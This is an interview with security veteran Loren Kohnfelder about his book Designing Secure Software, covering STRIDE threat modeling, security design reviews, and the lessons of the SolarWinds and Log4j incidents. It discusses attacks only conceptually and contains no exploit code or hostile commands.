Redesigning Security with Living-Legend Loren Kohnfelder


This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.

DesigningSecureSoftware coverLoren Kohnfelder

Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, detailing the concepts behind his personal perspective on technology (which can also be found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security-experts.


No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-ID model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service and Elevation of privileges), and you helped bake security-design reviews into the development process at Google—all of which are key growth spurts in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg first invented it in the late ’90s. Pretty remarkable that something started in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune from obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we now have pervasive internet connectivity, exponential growth in compute power and storage, cloud computing, and software itself is vastly more complex. All of these changes have grown the attack surface—plus our greater reliance on digital systems, as well as the massive amounts of data in the world, serve to increase motivation for attackers. For all of these reasons, threat modeling is more important than ever to gain a proactive view of the threat landscape for the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover the only threats software needs to be concerned with, especially now that we have IoT, robots, and self-driving cars that directly act in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats for systems interacting with people and machines in powerful ways.

 

NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software in the first place to review. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both approaches.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.

 

NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

Again, this is a different viewpoint worth considering in addition to, not instead of, the usual. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more facile at the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned for identifying these potential vulnerabilities.

 

NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of exactly what actually happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, that are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks products foresee and how they are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures, and also ensure that it's the latest version available, before trusting any code, and of course promptly install future updates that fix critical issues.

 

NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static in nature. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities are higher than the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)

 

NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms that improve safety in, say, the features of APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, too often I think the connection to vulnerabilities is under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of just these common pitfalls in a little over 100 pages, so I won't attempt to summarize all that here.

If your question about root causes goes deeper, asking why programming languages and API are so prone to security problems, then I would say it's often simply because the practice of software development goes back before there was much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem, and threats like ransomware. The same goes for API, which can fail to anticipate evolving threats that, once distributed, are very hard to fix later.

Another common cause in API design is failing to present a clean interface, in terms of trust relationship and security responsibility. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for a mistake to arise. So it's imperative for the API documentation to provide clear security commitments, or detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—that they may not even have been aware of—offered attackers an attractive point of entry.

 

NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library used by millions of applications, that has a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designer(s) recognized the threat or not, mitigated insufficiently, or simply failed to understand the consequences, is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is nearly a Perfect Storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than strings with escape sequences that got Log4j into trouble.

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of material (that would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that’d help. (I posted about Log4j at more length last year when it first became public.)

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.